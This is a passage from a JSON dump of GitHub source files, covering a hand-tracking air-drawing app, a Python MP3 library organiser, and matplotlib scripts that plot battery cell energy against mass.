Ideas of amelioration include :\n- Having a bigger dataset, with more diverse user data.\n- Process and smooth the finger signal, to be less dependent on camera quality, and to improve model generalization.\n"
},
{
"alpha_fraction": 0.5952693819999695,
"alphanum_fraction": 0.6675426959991455,
"avg_line_length": 22.090909957885742,
"blob_id": "26fc7da720153f58f5b4608bda3a2148e24c38a9",
"content_id": "03c84f2b3aed0cc2d99bffe2ac33b052ab9b0427",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 761,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 33,
"path": "/python-stuff/data-wrangling/labels-maker.py",
"repo_name": "Juan-glitch/air-drawing",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nimport cv2\n\n\ndata_file = 'thinking.csv'\n\n\"\"\"\nlabels must be a list of segments where the time serie class is true \n(i.e. the list of segments where the drawer has \"hands down\")\n\"\"\"\n\nlabels = [(29,96),(122,145),(162,185),(209,220),(244,261),(339,454)]\n\ndf = pd.read_csv('data/unlabeled_csv/'+data_file,index_col=0)\ndf[\"label\"] = False\n\nfor interval in labels:\n start,end = interval\n df.loc[start:end,\"label\"] = True\n\ndf.to_csv('data/raw_labeled/'+data_file)\n\ngood_points = df.loc[df['label'] == True][['x','y']]\npts = good_points.to_numpy().astype(int)\n\nimg = np.zeros((720,1280), dtype=np.uint8)\nimg[pts.T[1],pts.T[0]]=255\nimg = cv2.flip(img, 1)\n\ncv2.imshow('frame', img)\nkey = cv2.waitKey(0)\ncv2.destroyAllWindows()"
},
{
"alpha_fraction": 0.5372492671012878,
"alphanum_fraction": 0.5787965655326843,
"avg_line_length": 20.18181800842285,
"blob_id": "9dd467f97ef2fc4e6a3f2469c0c4683b79bd191e",
"content_id": "497ee6feede376d6500976108388a615d0ba9fb0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 698,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 33,
"path": "/python-stuff/data-wrangling/data-visualizer.py",
"repo_name": "Juan-glitch/air-drawing",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nimport cv2\n\n\ndf = pd.read_csv('data/unlabeled_csv/thinking.csv',index_col=0)\npts = df.to_numpy().astype(int)\n\nblack_img = np.zeros((720,1280), dtype=np.uint8)\n\nn = len(pts)\ncounter = 0\n\nwhile True:\n img = np.copy(black_img)\n img[pts[:counter].T[1],pts[:counter].T[0]]=255\n img = cv2.flip(img, 1)\n\n cv2.imshow('frame', img)\n key = cv2.waitKey(1)\n if key == ord('q'):\n break\n if key == ord('b'):\n counter = max(counter-1,0)\n print(counter-1)\n if key == ord('n'):\n counter = min(counter+1,n)\n print(counter-1)\n if key == ord('z'):\n counter = 0\n print(counter-1)\n\ncv2.destroyAllWindows()"
},
{
"alpha_fraction": 0.46206897497177124,
"alphanum_fraction": 0.47678160667419434,
"avg_line_length": 30.08571434020996,
"blob_id": "4cb958c8a2019420e1779fea3aa4b41956c73dc3",
"content_id": "1b60e8b841062a57dbabf5c7e6c5c196f26c5932",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2175,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 70,
"path": "/python-stuff/data-wrangling/add-features.py",
"repo_name": "Juan-glitch/air-drawing",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nfrom os import listdir\nfrom tqdm import tqdm\n\nraw_folder = \"data/raw_labeled/\"\noutput_folder = \"data/processed_labeled/\"\n\n# We intentionnaly drop some points to have a smoother drawing\n# interval define the step between each kept points\n\nfor interval in [1,2,3,4]:\n for f in tqdm(listdir(raw_folder)):\n df_raw = pd.read_csv(raw_folder+f,index_col=0)\n df = df_raw.iloc[::interval].copy().reset_index(drop=True)\n\n df[\"vx\"] = 0.\n df[\"vy\"] = 0.\n df[\"v\"] = 0.\n df[\"ax\"] = 0.\n df[\"ay\"] = 0.\n df[\"a\"] = 0.\n df[\"dist_left\"] = 0.\n df[\"dist_right\"] = 0.\n df[\"dist\"] = 0.\n n = df.shape[0]\n \n # add speed\n for k in range(1,n):\n vx = df.loc[k,'x'] - df.loc[k-1,'x']\n vy = df.loc[k,'y'] - df.loc[k-1,'y']\n v = np.sqrt(vx*vx + vy*vy)\n df.loc[k,'vx'] = vx\n df.loc[k,'vy'] = vy\n df.loc[k,'v'] = v\n\n # add acceleration\n for k in range(1,n):\n ax = df.loc[k,'vx'] - df.loc[k-1,'vx']\n ay = df.loc[k,'vy'] - df.loc[k-1,'vy']\n a = np.sqrt(ax*ax + ay*ay)\n df.loc[k,'ax'] = ax\n df.loc[k,'ay'] = ay\n df.loc[k,'a'] = a\n\n # distance to swap starting from the right side\n dist_right = 0.\n for k in range(1,n):\n dist_right += 1.\n current = n-k-1\n previous = n-k\n if df.loc[current,'label'] != df.loc[previous,'label']:\n dist_right = 0.\n df.loc[current,'dist_right'] = dist_right\n\n # distance to swap starting from the left side\n dist_left = 0.\n for k in range(1,n):\n dist_left += 1.\n current = k\n previous = k-1\n if df.loc[current,'label'] != df.loc[previous,'label']:\n dist_left = 0.\n df.loc[current,'dist_left'] = dist_left\n \n # min distance to a swap\n for k in range(1,n):\n df.loc[k,'dist'] = min(df.loc[k,'dist_left'],df.loc[k,'dist_right'])\n\n df.to_csv(f'{output_folder}{interval}_{f}')"
},
{
"alpha_fraction": 0.5463151931762695,
"alphanum_fraction": 0.571746826171875,
"avg_line_length": 28.767955780029297,
"blob_id": "173bbc931928db3f848303824ff03da6d263e629",
"content_id": "350c128de6100452a05e365c89ffa0029dc1874c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 5387,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 181,
"path": "/js/scriptent.js",
"repo_name": "Juan-glitch/air-drawing",
"src_encoding": "UTF-8",
"text": "const fingers = {\n index1: 8,\n index2: 7,\n index3: 6,\n index4: 5,\n middle1: 12,\n middle2: 11,\n middle3: 10,\n middle4: 9,\n ring1: 16,\n ring2: 15,\n ring3: 14,\n ring4: 13,\n little1: 20,\n little2: 19,\n little3: 18,\n little4: 17,\n thumb1: 4,\n thumb2: 3,\n thumb3: 2,\n thumb4: 1,\n thumb5: 0\n}\n\nconst finger_state = {\n landmarks: undefined,\n index: false,\n middle: false,\n ring: false,\n little: false\n}\n\nfunction gesture() {\n /*\n 0 : nothing\n 1 : index up, drawing state\n 2 : index and middle up, eraser state\n */\n if (finger_state.index && !finger_state.middle && !finger_state.ring && !finger_state.little) {return 1;}\n if (finger_state.index && finger_state.middle && !finger_state.ring && !finger_state.little) {return 2;}\n return 0;\n}\n\nfunction download_points(stroke_list) {\n const a = document.createElement(\"a\");\n const file = stroke_list.download();\n a.href = URL.createObjectURL(file);\n a.download = \"data.txt\";\n a.click();\n}\n\nclass Point {\n constructor(x,y) {\n this.x = x;\n this.y = y;\n }\n\n static distance(a,b) {\n return Math.hypot(a.x-b.x,a.y-b.y);\n }\n}\n\nfunction init() {\n const download_button = document.querySelector('#download_button')\n const clear_button = document.querySelector('#clear_button')\n const dl_button = document.querySelector('#dl_button')\n const video = document.querySelector('video');\n const canvas = document.querySelector('canvas');\n const context = canvas.getContext('2d');\n\n const width = canvas.width;\n const height = canvas.height;\n\n const erase_radius = 40.;\n\n const draw_icon = new Image();\n const erase_icon = new Image();\n draw_icon.src = 'assets/draw.png';\n erase_icon.src = 'assets/erase.png';\n\n let stroke_list = new StrokeList();\n let previous_pt = null;\n download_button.onclick = () => download_points(stroke_list);\n clear_button.onclick = () => stroke_list.clear();\n dl_button.onclick = () => stroke_list.predict();\n\n async function process() {\n context.save();\n\n // draw video stream\n context.clearRect(0, 0, canvas.width, canvas.height);\n context.drawImage(video, 0, 0, canvas.width, canvas.height);\n\n // draw hands\n await hands.send({image: video});\n\n let gest = gesture();\n\n // draw icons\n \n if (gest == 1) {\n // the user is drawing\n context.globalAlpha = 1;\n context.drawImage(draw_icon,width-166,height-100);\n // register point\n index_pos = finger_state.landmarks[fingers.index1];\n new_pt = new Point(index_pos.x*width,index_pos.y*height);\n stroke_list.add_pt(new_pt);\n previous_pt = new_pt;\n } else {\n if (previous_pt !== null) {\n stroke_list.new_stroke();\n previous_pt = null;\n }\n context.globalAlpha = 0.2;\n context.drawImage(draw_icon,width-166,height-100);\n }\n\n if (gest == 2) {\n // the user is erasing\n context.globalAlpha = 1;\n context.drawImage(erase_icon,width-166,height-200);\n // register erase\n idx = finger_state.landmarks[fingers.index1];\n mdl = finger_state.landmarks[fingers.middle1];\n erase_pos = new Point(width*(idx.x+mdl.x)/2.,height*(idx.y+mdl.y)/2.);\n // filter erased points\n stroke_list.erase(erase_pos,erase_radius);\n // draw eraser\n context.lineWidth = 5;\n context.strokeStyle = 'salmon';\n context.beginPath();\n context.arc(erase_pos.x, erase_pos.y, erase_radius, 0, 2*Math.PI);\n context.stroke()\n } else {\n context.globalAlpha = 0.2;\n context.drawImage(erase_icon,width-166,height-200);\n }\n context.restore();\n\n context.save();\n stroke_list.draw(context);\n context.restore();\n }\n\n function processHands(results) {\n if (results.multiHandLandmarks) {\n for (const landmarks of results.multiHandLandmarks) {\n drawConnectors(context, landmarks, HAND_CONNECTIONS,{color: '#00FF00', lineWidth: 5});\n drawLandmarks(context, landmarks, {color: '#FF0000', lineWidth: 2});\n\n // update fingers state\n finger_state.landmarks = landmarks;\n finger_state.index = landmarks[fingers.index1].y < landmarks[fingers.index3].y;\n finger_state.middle = landmarks[fingers.middle1].y < landmarks[fingers.middle3].y;\n finger_state.ring = landmarks[fingers.ring1].y < landmarks[fingers.ring3].y;\n finger_state.little = landmarks[fingers.little1].y < landmarks[fingers.little3].y;\n }\n }\n }\n\n const hands = new Hands({locateFile: (file) => {\n return `https://cdn.jsdelivr.net/npm/@mediapipe/hands/${file}`;\n }});\n hands.setOptions({\n selfieMode: false,\n maxNumHands: 1,\n minDetectionConfidence: 0.5,\n minTrackingConfidence: 0.5\n });\n hands.onResults(processHands);\n\n const camera = new Camera(video, {\n onFrame: process,\n width: 1920,\n height: 1080\n });\n camera.start();\n}\n\nwindow.onload = init"
},
{
"alpha_fraction": 0.6308186054229736,
"alphanum_fraction": 0.6966292262077332,
"avg_line_length": 21.285715103149414,
"blob_id": "b0229d51f2f789d267936b766801ecb755b5dacc",
"content_id": "09e43e97a27fd7242ed76262eb190e4717571ee9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 623,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 28,
"path": "/python-stuff/data-wrangling/visualize-rdp.py",
"repo_name": "Juan-glitch/air-drawing",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nimport cv2\nfrom rdp import rdp\nfrom os import listdir\n\n\ndf = pd.read_csv('data/raw_labeled/euler_sum.csv',index_col=0)\npoints = df[['x','y']].to_numpy().astype(int)\npoints_rdp = rdp(points,1.)\nprint(len(points))\nprint(len(points_rdp))\n\nimg = np.zeros((720,1280), dtype=np.uint8)\nimg[points.T[1],points.T[0]]=255\nimg = cv2.flip(img, 1)\n\ncv2.imshow('frame', img)\nkey = cv2.waitKey(0)\ncv2.destroyAllWindows()\n\nimg = np.zeros((720,1280), dtype=np.uint8)\nimg[points_rdp.T[1],points_rdp.T[0]]=255\nimg = cv2.flip(img, 1)\n\ncv2.imshow('frame', img)\nkey = cv2.waitKey(0)\ncv2.destroyAllWindows()"
},
{
"alpha_fraction": 0.5416666865348816,
"alphanum_fraction": 0.5439814925193787,
"avg_line_length": 24.47058868408203,
"blob_id": "8e3726bbba263b60bca9b5f3cf4190eaba971567",
"content_id": "90137d6cb766242a32417927c49a4b7c37a1b67a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 432,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 17,
"path": "/python-stuff/data-wrangling/json-to-csv.py",
"repo_name": "Juan-glitch/air-drawing",
"src_encoding": "UTF-8",
"text": "import json\nimport pandas as pd\nfrom os import listdir\n\ntxt_folder = \"data/unlabeled_txt/\"\ncsv_folder = \"data/unlabeled_csv/\"\n\nfor file in listdir(txt_folder):\n with open(txt_folder+file) as f:\n data = json.load(f)\n x = []\n y = []\n for pt in data:\n x.append(pt['x'])\n y.append(pt['y'])\n df = pd.DataFrame(data={'x': x,'y': y})\n df.to_csv(csv_folder+file[:-3]+'csv')"
},
{
"alpha_fraction": 0.6310432553291321,
"alphanum_fraction": 0.6844783425331116,
"avg_line_length": 22.176469802856445,
"blob_id": "d42f23684a8afbc0181e4aafee62f46c3e1adf89",
"content_id": "ae503c5a49bb345ecf56c805a3d0aa5a58bce5ce",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 393,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 17,
"path": "/python-stuff/data-wrangling/label-visualizer.py",
"repo_name": "Juan-glitch/air-drawing",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nimport cv2\nfrom os import listdir\n\n\ndf = pd.read_csv('data/raw_labeled/reveil.csv',index_col=0)\ngood_points = df.loc[df['label'] == True][['x','y']]\npts = good_points.to_numpy().astype(int)\n\nimg = np.zeros((720,1280), dtype=np.uint8)\nimg[pts.T[1],pts.T[0]]=255\nimg = cv2.flip(img, 1)\n\ncv2.imshow('frame', img)\nkey = cv2.waitKey(0)\ncv2.destroyAllWindows()"
}
] | 8 |
mayupsc/some_python_codes
|
https://github.com/mayupsc/some_python_codes
|
1b2fccb47c73d836b779e5f168e7c358b234889f
|
aac8687f69ca269a0104880e0240f03142d368c4
|
d7df3f4922347f04035dfa54c5fbed88707e5139
|
refs/heads/master
| 2020-04-08T23:33:04.026765 | 2018-11-30T13:46:26 | 2018-11-30T13:46:26 | 159,829,390 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5740498304367065,
"alphanum_fraction": 0.5969855785369873,
"avg_line_length": 35.219512939453125,
"blob_id": "2d26521a9f408eda0f50fcc2aacb0a0e53f6d0e6",
"content_id": "f7c67f14f413d7cd609b89138fac8c9551f679d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1526,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 41,
"path": "/select.py",
"repo_name": "mayupsc/some_python_codes",
"src_encoding": "UTF-8",
"text": "#1/usr/bin/env python3\r\nimport re\r\nimport fileinput\r\nfrom collections import defaultdict\r\n\r\ngene_dict = defaultdict(list)\r\ntx_dict = defaultdict(list)\r\ntx_pos_dict = defaultdict(list)\r\nf=open(\"/home/galaxy/Desktop/Oryza_sativa.IRGSP-1.0.41.gff3\")\r\nf.new=open(\"/home/galaxy/Desktop/Oryza_sativa.IRGSP-1.0.41.gff3.new\",\"w\")\r\nfor line in f:\r\n if line.startswith(\"#\"):\r\n continue\r\n content = line.split(\"\\t\")\r\n if content[2] == 'gene':\r\n gene_id = re.search(r'ID=(.*?)[;\\n]',content[8]).group(1)\r\n gene_dict[gene_id] = []\r\n if content[2] == 'transcript' or content[2] == 'mRNA':\r\n tx_id = re.search(r'ID=(.*?)[;\\n]',content[8]).group(1)\r\n tx_parent = re.search(r'Parent=(.*?)[;\\n]',content[8]).group(1)\r\n gene_dict[tx_parent].append(tx_id)\r\n tx_pos_dict[tx_id] = [content[0],content[3], content[4], content[6]]\r\n if content[2] == 'CDS':\r\n width = int (content[4]) - int(content[3])\r\n cds_parent = re.search(r'Parent=(.*?)[;\\n]',content[8]).group(1)\r\n tx_dict[cds_parent].append(width)\r\n\r\nfor gene, txs in gene_dict.items():\r\n tmp = 0\r\n for tx in txs:\r\n tx_len = sum(tx_dict[tx])\r\n if tx_len > tmp:\r\n lst_tx = tx\r\n tmp = tx_len\r\n tx_chrom = tx_pos_dict[lst_tx][0]\r\n tx_start = tx_pos_dict[lst_tx][1]\r\n tx_end = tx_pos_dict[lst_tx][2]\r\n tx_strand = tx_pos_dict[lst_tx][3]\r\n f.new.write(\"{gene}\\t{tx}\\t{chrom}\\t{start}\\t{end}\\t{strand}\\n\".format(gene=gene,tx=lst_tx,chrom=tx_chrom,start=tx_start,end=tx_end,strand=tx_strand))\r\n\r\nf.new.close()\r\n"
}
] | 1 |
cjngh/biliRename
|
https://github.com/cjngh/biliRename
|
f6773385bb90f7ac2c76ffcc15212fb94d32f8a3
|
a7326bc2468aaba76fd241a34dfdb617a690363e
|
7627cdd6adbedaf7bcb17fb8d2cc01318e7b2455
|
refs/heads/master
| 2020-05-25T09:49:00.276878 | 2019-05-21T03:24:17 | 2019-05-21T03:24:17 | 187,746,530 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.601636528968811,
"alphanum_fraction": 0.6128337383270264,
"avg_line_length": 37.71666717529297,
"blob_id": "c4a9a58ede8d472ad1f191696f10a0642a400518",
"content_id": "9d8bc3d390d7d262b0e337c8bb0e7e2afaeca2b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2756,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 60,
"path": "/biliRename.py",
"repo_name": "cjngh/biliRename",
"src_encoding": "UTF-8",
"text": "import os\nimport json\nimport shutil\nimport winreg\n\n# author:skybay\n# date:2019/04/22\n# 公众号:skybay\n\ndef getDesktop():\n key=winreg.OpenKey(winreg.HKEY_CURRENT_USER,r'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders')\n return winreg.QueryValueEx(key,'Desktop')[0]\n\ndef getSubDirNames(file_dir):\n for root,dirs,files in os.walk(file_dir):\n return dirs\n\n\ndef getSubFileNames(file_dir):\n for root,dirs,files in os.walk(file_dir):\n return files\n\n\nif __name__==\"__main__\":\n print(\"请确保B站缓存数字文件夹保存在桌面“B站缓存”文件夹中!\")\n input(\"若确定视频已保存在桌面“B站缓存”文件夹中,则回车开始重命名!\")\n desktop=getDesktop()\n srcFile=desktop+r\"\\B站缓存\"\n dirList=getSubDirNames(srcFile) # 获取数字子文件夹列表(只包含子文件夹)\n for path in dirList:\n dirPath=os.path.join(srcFile,path) # 拼接视频集合数字子文件夹路径\n dirList2 = getSubDirNames(dirPath) # 获取单集数字子文件夹列表(只包含子文件夹)\n setTitle=\"\" # 集合名\n setTitlePath=\"\" # 集合路径\n for path1 in dirList2:\n dirPath1=os.path.join(dirPath,path1) # 拼接单集数字子文件夹路径\n fileNames=getSubFileNames(dirPath1) # 获取单集数字子文件夹中的文件列表\n for infoFileNames in fileNames: # 获取并暂存标题\n infoFilePath=os.path.join(dirPath1,infoFileNames) # 拼接单集数字子文件夹中文件的路径\n if infoFilePath.endswith(\"json\"):\n openFile=open(infoFilePath,encoding=\"UTF-8\")\n info=openFile.read()\n if not setTitle.strip():\n setTitle=json.loads(info)[\"title\"] # 集合名\n setTitlePath=os.path.join(srcFile,setTitle)\n os.makedirs(setTitlePath)\n title=json.loads(info)[\"page_data\"][\"part\"] # 单集名\n openFile.close()\n dir3Name=getSubDirNames(dirPath1) # 获取第四层文件夹名\n dirPath2=os.path.join(dirPath1,dir3Name[0]) # 拼接视频所在文件夹路径\n files = getSubFileNames(dirPath2) # 获取视频文件夹中的文件列表\n for VFile in files:\n if VFile.endswith(\"blv\"):\n oldVFileName=dirPath2+\"\\\\\"+VFile\n newVFileName=os.path.join(dirPath2,title)+'.blv'\n os.rename(oldVFileName,newVFileName) # 改名\n shutil.move(newVFileName,setTitlePath) # 移动\n for path in dirList:\n dirPath = os.path.join(srcFile, path)\n shutil.rmtree(dirPath)"
}
] | 1 |
Velinsky/Music-Library-Builder
|
https://github.com/Velinsky/Music-Library-Builder
|
458159f2bb95150f6cc1c98e8b3d27a493c8a14c
|
80655de6b1dfdc74f30f1e89d4b69067165a9ede
|
c69245e7096ae6fe42ab8730a69c3665c849d3cc
|
refs/heads/master
| 2020-12-25T18:18:52.400944 | 2011-07-08T19:26:17 | 2011-07-08T19:26:17 | 2,013,763 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7412587404251099,
"alphanum_fraction": 0.7412587404251099,
"avg_line_length": 35,
"blob_id": "a2ef7dba91a989e0e1e499e6e5fbdddb4d3988b0",
"content_id": "eb5144c4d1ebe7f5a3fcf2ce244e36b6291c842a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 4,
"path": "/config.py",
"repo_name": "Velinsky/Music-Library-Builder",
"src_encoding": "UTF-8",
"text": "# constants definitions\nMUSIC_INBOX_DIR = 'F:\\Music\\inbox'\nMUSIC_QUANTUM_DIR = 'C:\\Projects\\Music Quantum'\nMUSIC_OUTBOX_DIR = 'F:\\Music\\outbox'"
},
{
"alpha_fraction": 0.6388206481933594,
"alphanum_fraction": 0.6584766507148743,
"avg_line_length": 22.257143020629883,
"blob_id": "822f16c890a212273bec2ae0199d404279f672f5",
"content_id": "ad0968529d5f5e2b71f4ac4596d865201066b119",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 814,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 35,
"path": "/quantum-progress-reader.py",
"repo_name": "Velinsky/Music-Library-Builder",
"src_encoding": "UTF-8",
"text": "__author__ = 'Martin'\n\nfrom functions import *\nfrom config import *\nfrom mutagen.mp3 import MP3\n\nimport mutagen.mp3\nimport os\n\n# constant definitions\nID3_PLAYERPRO_RATING_TAG = \"POPM:PlayerPro Android\"\n\nfiles = os.listdir(MUSIC_QUANTUM_DIR)\nfiles_to_delete = []\n\n\n# deleting files with rating 1* (51 out of 255)\nfor file in files:\n tag_infos = MP3(MUSIC_QUANTUM_DIR + \"\\\\\" + file)\n\n if ID3_PLAYERPRO_RATING_TAG in tag_infos:\n if tag_infos[ID3_PLAYERPRO_RATING_TAG].rating == 51:\n files_to_delete.append(file)\n\nprint \"Found \" + str(len(files_to_delete)) + \" files with 1* rating\"\n\nvar = raw_input(\"Delete them? (y/n)\")\n\n\nif var == \"y\":\n for file in files_to_delete:\n file_to_delete = MUSIC_QUANTUM_DIR + \"\\\\\" + file\n os.unlink(file_to_delete)\n\n print \"Deleted the files\"\n"
},
{
"alpha_fraction": 0.6450116038322449,
"alphanum_fraction": 0.6484918594360352,
"avg_line_length": 24.235294342041016,
"blob_id": "a9befd428cb809e048d8c1cd4ba19838c38bb395",
"content_id": "dc47d3e1f962e4aaa26d630d54af4fcacd68bedc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 862,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 34,
"path": "/functions.py",
"repo_name": "Velinsky/Music-Library-Builder",
"src_encoding": "UTF-8",
"text": "__author__ = 'Martin'\n\nimport os\nimport colorama\n\ncolorama.init()\n\ndef ensure_dir(f):\n \"\"\"\n create folder structure, if not exits\n \"\"\"\n d = os.path.dirname(f)\n if not os.path.exists(f):\n print \"shoud make dir\"\n os.makedirs(f)\n\nclass style:\n def h1(self):\n return colorama.Back.GREEN + colorama.Fore.BLACK + colorama.Style.DIM\n\n def h2(self):\n return colorama.Back.BLUE + colorama.Fore.WHITE + colorama.Style.DIM\n\n def h3(self):\n return colorama.Back.GRAY + colorama.Fore.BLACK + colorama.Style.DIM\n\n def error(self):\n return colorama.Back.RED + colorama.Fore.WHITE + colorama.Style.DIM\n\n def info(self):\n return colorama.Back.BLACK + colorama.Fore.WHITE + colorama.Style.DIM\n\n def normal(self):\n return colorama.Back.BLACK + colorama.Fore.WHITE + colorama.Style.BRIGHT\n\n\n\n\n"
},
{
"alpha_fraction": 0.642578125,
"alphanum_fraction": 0.646484375,
"avg_line_length": 30.26530647277832,
"blob_id": "a40aa8167ebd08de9311a118862455b1a983369e",
"content_id": "047baf1a5ceebfabbb5843210e6d41cffaca39da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1536,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 49,
"path": "/main.py",
"repo_name": "Velinsky/Music-Library-Builder",
"src_encoding": "UTF-8",
"text": "from os import *\nfrom functions import *\nfrom config import *\n\nimport re\nimport sys\n\n\n\n# number of songs to move to quantum folder, if it is empty\nQUANTUM_SIZE = 100\n\n# application initialization\n\n# print style().h1() + ' === Otaguj si svoji hudbu === ' + style().normal()\n\n\n# make sure all necessary directories exists\nensure_dirs = [MUSIC_OUTBOX_DIR, MUSIC_QUANTUM_DIR]\n\nfor single_dir in ensure_dirs:\n if not os.path.exists(single_dir):\n ensure_dir(single_dir)\n print style().info() + 'folder ' + single_dir + ' does not exists, creating' + style().normal()\n\n# check whether any files are in quantum dir\nif not os.listdir(MUSIC_QUANTUM_DIR):\n print\n print style().h2() + 'QUANTUM is empty, filling it with files' + style().normal()\n\n # list all files in inbox\n quantum_files = []\n for root, dirs, files in os.walk(MUSIC_INBOX_DIR):\n for file in files:\n if re.search(\".mp3|.wma\", file):\n quantum_files.append(root + \"\\\\\" + file)\n\n # take quantum from inbox\n quantum_files = quantum_files[:QUANTUM_SIZE]\n print 'Taking ' + str(len(quantum_files)) + ' files from inbox'\n\n for quantum_file in quantum_files:\n os.rename(quantum_file, MUSIC_QUANTUM_DIR + \"\\\\\" + os.path.basename(quantum_file))\n sys.stdout.write('.')\n\n print style().normal()\n print style().normal() + 'Files moved from inbox to quantum'\nelse:\n print style().normal() + 'There are files on quantum (' + str(len(os.listdir(MUSIC_QUANTUM_DIR))) + '), thus doing nothing'\n\n\n\n\n"
}
] | 4 |
Putter173/NEC_SingleCycle
|
https://github.com/Putter173/NEC_SingleCycle
|
afdff88fb4181206fd405be5d15069da4563436b
|
cd7211b4fbf28431aea9797c9a2920bfc2fb4a69
|
801647de935c2ba1e7626d5b2c7798a383a6bf3e
|
refs/heads/main
| 2023-06-29T12:23:36.107535 | 2021-08-02T20:18:58 | 2021-08-02T20:18:58 | 380,172,922 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.403950959444046,
"alphanum_fraction": 0.4339236915111542,
"avg_line_length": 29.58333396911621,
"blob_id": "9c0124f60a3d63f344c5fb664441e3a998fe7c14",
"content_id": "61702d3b23508c20dbfaa1298ea7eefbdc0689af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1468,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 48,
"path": "/EME&EM_AgainstMass_NMC-Only.py",
"repo_name": "Putter173/NEC_SingleCycle",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport csv\n\nx = []\ny0 = []\ny1 = []\n\nwith open('data.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n line_count += 1\n else:\n if row[2] == \"NMC\":\n no = row[0]\n energy = row[18]\n if energy == \"\":\n energy = 0\n else:\n energy = row[18]\n mass = row[13]\n energy = float(energy)\n mass = float(mass)\n eme = round(energy / mass, 2)\n anode = row[6]\n if anode == \"Al\":\n anode = 0.0106\n elif anode == \"Cu\":\n anode = 0.0175\n else:\n raise ValueError('Unindentified Value for Anode Foil Material on row: ' + line_count)\n active = round(mass - 0.0106 - anode, 4)\n em = round(energy / active, 4)\n x.append(mass)\n y0.append(eme)\n y1.append(em)\n line_count += 1\n else:\n line_count += 1\n\nplt.scatter(x, y0, color= \"red\", marker= \".\", label = \"EME\", s=30)\nplt.scatter(x, y1, color= \"blue\", marker= \".\", label = \"EM\", s=30)\nplt.xlabel('Mass')\nplt.ylabel('EME & EM')\nplt.title('EME, EM & Mass - @ Cycle 5 (NMC ONLY)')\nplt.legend()\nplt.show() "
},
{
"alpha_fraction": 0.4488491117954254,
"alphanum_fraction": 0.4693094491958618,
"avg_line_length": 23.4375,
"blob_id": "991d8008b47a04260ac2992c3e84de79c54ce0ad",
"content_id": "f09ae5b5554f90d02af94cbd699d9e0010ffcd6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 782,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 32,
"path": "/EME_Against_FirstCycle.py",
"repo_name": "Putter173/NEC_SingleCycle",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport csv\n\nx = []\ny = []\n\nwith open('data.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n line_count += 1\n else:\n no = row[0]\n energy = row[14]\n if energy == \"\":\n energy = 0\n else:\n energy = row[14]\n mass = row[13]\n energy = float(energy)\n mass = float(mass)\n eme = round(energy / mass, 2)\n x.append(no)\n y.append(eme)\n line_count += 1 \n\nplt.scatter(x, y, color= \"red\", marker= \".\", s=30)\nplt.xlabel('Cell No.')\nplt.ylabel('EME')\nplt.title('EME & Cell - @ Cycle 1')\nplt.show() "
},
{
"alpha_fraction": 0.3735056519508362,
"alphanum_fraction": 0.41324716806411743,
"avg_line_length": 34.574710845947266,
"blob_id": "34dc9948999f49f153a56601eff1398fe0550744",
"content_id": "97ac4973cd7d4afec3b110a2191ee3ca490b91a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3105,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 87,
"path": "/EME_AgainstMassByThickness_NMC-Only.py",
"repo_name": "Putter173/NEC_SingleCycle",
"src_encoding": "UTF-8",
